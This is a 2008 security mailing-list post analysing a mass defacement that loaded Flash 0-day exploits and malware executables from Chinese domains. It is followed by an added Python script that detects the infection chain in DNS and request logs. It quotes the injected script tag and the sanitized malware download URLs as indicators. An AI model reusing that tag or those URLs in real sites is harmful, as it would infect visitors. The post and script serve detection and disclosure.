[nsp-sec] (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild

Brian Eckman eckman at umn.edu
Tue May 27 16:08:30 EDT 2008


nsp-sec,

 > host www.dota11.cn
www.dota11.cn has address 221.206.20.145

 > host www.woai117.cn
www.woai117.cn has address 221.206.20.145

 > host www.117276.cn
www.117276.cn has address 221.206.20.145


AS      | IP               | AS Name
4837    | 221.206.20.145   | CHINA169-BACKBONE CNCGROUP China169 Backbone

PEER_AS | IP               | AS Name
174     | 221.206.20.145   | COGENT Cogent/PSI
701     | 221.206.20.145   | UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
1239    | 221.206.20.145   | SPRINTLINK - Sprint
3257    | 221.206.20.145   | TISCALI-BACKBONE Tiscali Intl Network BV
3320    | 221.206.20.145   | DTAG Deutsche Telekom AG
4134    | 221.206.20.145   | CHINANET-BACKBONE No.31,Jin-rong Street
7018    | 221.206.20.145   | ATT-INTERNET4 - AT&T WorldNet Services
7473    | 221.206.20.145   | SINGTEL-AS-AP Singapore Telecom


(Malicious URLs sanitized to (dot)cn instead of .cn to avoid accidental access.)

This is all based on my experience with this problem this afternoon, and is
surely incomplete. However, I hope that it's timely and helpful regardless...

Many of you have probably seen reports of a 0-day exploit in Adobe Flash
Player. SANS Internet Storm Center has a diary entry at
http://isc.sans.org/diary.html?n&storyid=4465. Symantec raised their
ThreatCon as outlined at
http://www.symantec.com/security_response/threatconlearn.jsp

I've seen evidence of a mass defacement (similar - likely identical - to the
recent SQL injections apparently coming from China and noted in various 
advisories), where <script src=http://www.dota11(dot)cn/m.js> has
been inserted into the HTML source of many Web sites. m.js on that site,
among other things, loads up http://www.woai117(dot)cn/4561.swf or
http://www.woai117(dot)cn/4562.swf. After one of those flash scripts
determines the flash version, the browser is then pointed to
http://www.woai117(dot)cn/WIN%20<insert-flash-player-version-here>[f|i].swf
(example: http://www.woai117(dot)cn/WIN%209,0,115,0f.swf for Adobe Flash
Player 9,0,115,0 for Windows) (likely more than just the letters "f" and "i"
can be appended - again - I'm just sharing what I've observed in limited
testing).

In my testing, the exploits for 9,0,124,0 are NOT there, even though
browsers will be pointed to a page like "WIN%209,0,124,0f.swf" (a 404 page
is returned with no additional exploits, as far as I've seen). My hunch is
that there were exploits for that version earlier (simply based on
Symantec's claim), but that they were pulled for some reason - perhaps to try
to keep certain 0day code as 0day for longer. (Or else Symantec is wrong. Not
like that ever happens!)   ;-)

On my test XP box with Flash Viewer 9,0,115,0, the "GET
/WIN%209,0,115,0f.swf" request downloaded the .swf, which in turn ultimately
caused all of the following to be downloaded and executed:

http://www.woai117(dot)cn/117.exe
http://www.117276(dot)cn/1.exe
http://www.117276(dot)cn/2.exe
http://www.117276(dot)cn/3.exe
http://www.woai117(dot)cn/bing.exe
http://www.woai117(dot)cn/kiss.txt

The snort rule "ET TROJAN Otwycal User-Agent (Downing)" was triggered by
most, if not all of those downloads.

117.exe analysis
----------------
Virustotal: http://www.virustotal.com/analisis/20e51bbef245e3eeb3dd9b9835c09291

Anubis Sandbox:
http://anubis.iseclab.org/result.php?taskid=62147cf6aaf70fc4a5fa20516483924c


I believe that queries for "www.117276(dot)cn" might be a reliable indicator
of a successful infection - particularly if preceded by "www.dota11(dot)cn"
and "www.woai117(dot)cn".

Brian
-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
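Added example (not part of Brian's post, and not a tool from any project named in it): a small
Python script that turns the two observations above into detection logic. It checks the
"queries for www.117276(dot)cn preceded by www.dota11(dot)cn and www.woai117(dot)cn" indicator
over a DNS query log, and it matches the version-specific "WIN%20<version><letter>.swf" request
path in proxy or web logs. The DNS log lines, the log format (timestamp, client IP, queried
name), the 10-minute correlation window and the acceptance of any trailing letter (the post only
saw "f" and "i") are all my assumptions, chosen for illustration.

```python
"""Detection helpers for the Flash infection chain described in the post.

Both the log format and the sample lines below are constructed for this example;
the hostnames and the WIN%20<version><letter>.swf naming are the ones observed in
the post. The hostnames use a real dot here because the script never fetches them.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample DNS query log: "<ISO timestamp> <client IP> <queried name>".
SAMPLE_DNS_LOG = """\
2008-05-27T14:01:02 10.0.0.5 www.dota11.cn
2008-05-27T14:01:03 10.0.0.5 www.woai117.cn
2008-05-27T14:01:09 10.0.0.5 www.117276.cn
2008-05-27T14:05:00 10.0.0.9 www.117276.cn
2008-05-27T14:07:30 10.0.0.7 www.dota11.cn
2008-05-27T14:40:00 10.0.0.7 www.117276.cn
2008-05-27T14:10:00 10.0.0.8 www.example.org
"""

# Stages of the chain in the order the post describes them; the last name is the
# one the post singles out as the likely "successful infection" indicator.
STAGE_NAMES = ["www.dota11.cn", "www.woai117.cn", "www.117276.cn"]

# Assumed correlation window: the earlier stages must fall within this much time
# before the final query for the chain to be treated as one visit.
WINDOW = timedelta(minutes=10)

# Assumed generalisation of the observed request path: /WIN%20<a>,<b>,<c>,<d><letter>.swf
# (the post only saw the letters "f" and "i"; any single letter is accepted here).
FLASH_PROBE_RE = re.compile(r"/WIN(?:%20| )(\d+,\d+,\d+,\d+)([a-z])\.swf$", re.IGNORECASE)


def parse_dns_log(text):
    """Parse the constructed log format into (timestamp, client, name) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, name = line.split()
        events.append((datetime.fromisoformat(ts), client, name.lower()))
    return events


def classify_clients(events, window=WINDOW):
    """Return {client: verdict} for every client that queried the final-stage name.

    'likely-infected' when both earlier-stage names were queried by the same client
    within `window` before the final-stage query; otherwise 'suspect'. Clients that
    never queried the final-stage name are not reported at all.
    """
    by_client = defaultdict(list)
    for ts, client, name in sorted(events):
        by_client[client].append((ts, name))

    verdicts = {}
    for client, seq in by_client.items():
        for i, (ts, name) in enumerate(seq):
            if name != STAGE_NAMES[-1]:
                continue
            earlier = {n for t, n in seq[:i] if ts - t <= window}
            if all(stage in earlier for stage in STAGE_NAMES[:-1]):
                verdicts[client] = "likely-infected"
                break
            verdicts[client] = "suspect"
    return verdicts


def flash_probe_version(path):
    """Return (flash_version, letter) if a request path matches the probe naming, else None."""
    m = FLASH_PROBE_RE.search(path)
    return (m.group(1), m.group(2).lower()) if m else None


if __name__ == "__main__":
    for client, verdict in sorted(classify_clients(parse_dns_log(SAMPLE_DNS_LOG)).items()):
        print(f"{client}: {verdict}")
    for path in ("/WIN%209,0,115,0f.swf", "/WIN%209,0,124,0i.swf", "/4561.swf"):
        print(f"{path}: {flash_probe_version(path)}")
```

The DNS check deliberately reports a lone query for the final-stage name as only "suspect": the
post's own caveat is that the earlier two names make the indicator reliable, and a single lookup
could just as well be an analyst or a crawler. Feeding real logs only needs `parse_dns_log` to be
replaced with a parser for the resolver's actual format.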
